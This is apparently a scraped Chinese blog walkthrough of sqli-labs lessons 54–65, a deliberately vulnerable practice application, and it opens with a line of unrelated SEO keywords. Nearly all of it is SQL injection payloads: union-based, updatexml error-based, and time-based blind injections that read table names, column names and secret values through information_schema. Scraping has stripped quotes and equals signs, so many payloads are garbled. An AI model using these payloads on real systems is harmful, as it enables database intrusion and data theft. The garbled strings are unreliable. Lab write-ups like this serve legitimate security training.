网站建设公司 深圳,镇江建设质量监督站网站,运维需要掌握哪些知识,关键词林俊杰【Less-54】 与前面的题目不同是#xff0c;这里只能提交10次#xff0c;一旦提交超过十次#xff0c;数据会重新刷新#xff0c;所有的步骤需要重来一次。
解题步骤#xff1a;
根据测试#xff0c;使用的是单引号闭合。
# 判断字段的数量
?id1 order by 3 -- aaa# …【Less-54】 与前面的题目不同是这里只能提交10次一旦提交超过十次数据会重新刷新所有的步骤需要重来一次。
解题步骤
根据测试使用的是单引号闭合。
# 判断字段的数量
?id1 order by 3 -- aaa# 获取数据库的名字
?id-1 union select 1,2,database() -- aa# 获取数据表的名字
?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase() -- aa # 获取字段名,上一步获取的数据表名为73m93vdzgg随机生成的
?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_name73m93vdzgg-- aa # 获取目标信息
?id-1 union select 1,2,secret_8QFM from 73m93vdzgg -- aa 最后把获取到的Key值放入输入框中提交通关。
【Less-55】
通过测试使用的是括号闭合。 解题步骤
# 判断字段的数量
?id1) order by 3 -- aaa# 获取数据库的名字
?id-1) union select 1,2,database() -- aa# 获取数据表的名字
?id-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase() -- aa # 获取字段名,上一步获取的数据表名为lll4ndq8t5随机生成的
?id-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namelll4ndq8t5-- aa # 获取目标信息,字段名为secret_JY1K
?id-1) union select 1,2,secret_JY1K from lll4ndq8t5 -- aa 【Less-56】
与上面两题类似只是闭合的类型不同采用的是单引号括号的方式。
解题步骤和上面基本一致如下
# 判断字段的数量
?id1) order by 3 -- aaa# 获取数据库的名字
?id-1) union select 1,2,database() -- aa# 获取数据表的名字
?id-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase() -- aa # 获取字段名,上一步获取的数据表名为bpunqnpx62随机生成的
?id-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namebpunqnpx62-- aa # 获取目标信息,字段名为secret_0OCB
?id-1) union select 1,2,secret_0OCB from bpunqnpx62 -- aa 【Less-57】
同样类型的题目与之前的几题基本一样只是闭合采用的是双引号。
解题步骤
# 判断字段的数量
?id1 order by 3 -- aaa# 获取数据库的名字
?id-1 union select 1,2,database() -- aa# 获取数据表的名字
?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase() -- aa # 获取字段名,上一步获取的数据表名为mim20rhi4p随机生成的
?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namemim20rhi4p-- aa # 获取目标信息,字段名为secret_3YCT
?id-1 union select 1,2,secret_3YCT from mim20rhi4p -- aa 【Less-58】
通过测试使用的是单引号闭合。
解题过程和之前的集体类似只是没有回显信息解题步骤如下 # 获取数据库的名字
?id-1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aa
# 获取数据表的名字
?id-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1) -- aa# 获取字段名,上一步获取的数据表字段名为s93lfq2cfa随机生成的
?id-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_names93lfq2cfa),0x7e),1) -- aa# 获取目标信息,字段名为secret_REV6
?id-1 and updatexml(1,concat(0x7e,(select secret_REV6 from s93lfq2cfa),0x7e),1) -- aa 【Less-59】
与Less-58基本相同唯一的不同在于闭合方式Less-59是直接注入的方式。
# 获取数据库的名字
?id-1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) # 获取数据表的名字 w7hf6t37nt
?id-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1) # 获取字段名,上一步获取的数据表名为w7hf6t37nt随机生成的
?id-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namew7hf6t37nt),0x7e),1)# 获取目标信息,字段名为secret_D5MM
?id-1 and updatexml(1,concat(0x7e,(select secret_D5MM from w7hf6t37nt),0x7e),1)【Less-60】
与上题类似闭合使用的是双引号括号。
解题步骤 # 获取数据库的名字
?id-1) and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aa# 获取数据表的名字
?id-1) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1) -- aa# 获取字段名,上一步获取的数据表名为kz7qxr5nq1随机生成的
?id-1) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namekz7qxr5nq1),0x7e),1) -- aa# 获取目标信息,字段名为secret_TEGV
?id-1) and updatexml(1,concat(0x7e,(select secret_TEGV from kz7qxr5nq1),0x7e),1) -- aa 【Less-61】
经过测试本题的闭合方式为单引号加两个括号。
解题步骤 # 获取数据库的名字
?id-1)) and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aa# 获取数据表的名字
?id-1)) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1) -- aa# 获取字段名,上一步获取的数据表名为31nbt3hzri随机生成的
?id-1)) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_name31nbt3hzri),0x7e),1) -- aa# 获取目标信息,字段名为secret_QQ63
?id-1)) and updatexml(1,concat(0x7e,(select secret_QQ63 from 31nbt3hzri),0x7e),1) -- aa 【Less-62】
此题的闭合方式为单引号加括号与之前题目不同的是此题没有显错采用盲注的方式解题。
解题步骤
# 获取数据库的名字长度为10
?id1) and length(database())10 -- aa# 获取数据库的名字
?id1) and if(ascii(substr(database(),1,1))100,sleep(5),1) -- aa# 获取数据表名的长度,10
?id1) and if(length((select table_name from information_schema.tables where table_schemadatabase()limit 0,1))10,sleep(5),1) -- aa# 获取数据表的名字,此时的数据表名是随机生成的没有统计标准自行测试。
?id1) and if(ascii(substr((select table_name from information_schema.tables where table_schemadatabase()limit 0,1),1,1))98,sleep(5),1) -- aa# 获取字段名
?id1) and if(ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_name 上一步获取的数据表名 limit 0,1),1,1))98,sleep(5),1) -- aa
此时可以使用Burp Sutie工具实现名字的遍历。 【Less-63】
基本与Less-62一样闭合是单引号闭合。 解题步骤
# 获取数据库的名字长度为10
?id1 and length(database())10 -- aa# 获取数据库的名字
?id1 and if(ascii(substr(database(),1,1))100,sleep(5),1) -- aa# 获取数据表名的长度,10
?id1 and if(length((select table_name from information_schema.tables where table_schemadatabase()limit 0,1))10,sleep(5),1) -- aa# 获取数据表的名字,此时的数据表名是随机生成的没有统计标准自行测试。
?id1 and if(ascii(substr((select table_name from information_schema.tables where table_schemadatabase()limit 0,1),1,1))98,sleep(5),1) -- aa# 获取字段名
?id1 and if(ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_name 上一步获取的数据表名 limit 0,1),1,1))98,sleep(5),1) -- aa
【Less-64】
基本与Less-63一样闭合是两个括号 解题步骤
# 获取数据库的名字长度为10
?id1)) and length(database())10 -- aa# 获取数据库的名字
?id1)) and if(ascii(substr(database(),1,1))100,sleep(5),1) -- aa# 获取数据表名的长度,10
?id1)) and if(length((select table_name from information_schema.tables where table_schemadatabase()limit 0,1))10,sleep(5),1) -- aa# 获取数据表的名字,此时的数据表名是随机生成的没有统计标准自行测试。
?id1)) and if(ascii(substr((select table_name from information_schema.tables where table_schemadatabase()limit 0,1),1,1))98,sleep(5),1) -- aa# 获取字段名
?id1)) and if(ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_name 上一步获取的数据表名 limit 0,1),1,1))98,sleep(5),1) -- aa
【Less-65】
基本与Less-63一样闭合是双引号括号 解题步骤
# 获取数据库的名字长度为10
?id1) and length(database())10 -- aa# 获取数据库的名字
?id1) and if(ascii(substr(database(),1,1))100,sleep(5),1) -- aa# 获取数据表名的长度,10
?id1) and if(length((select table_name from information_schema.tables where table_schemadatabase()limit 0,1))10,sleep(5),1) -- aa# 获取数据表的名字,此时的数据表名是随机生成的没有统计标准自行测试。
?id1) and if(ascii(substr((select table_name from information_schema.tables where table_schemadatabase()limit 0,1),1,1))98,sleep(5),1) -- aa# 获取字段名
?id1) and if(ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_name 上一步获取的数据表名 limit 0,1),1,1))98,sleep(5),1) -- aa
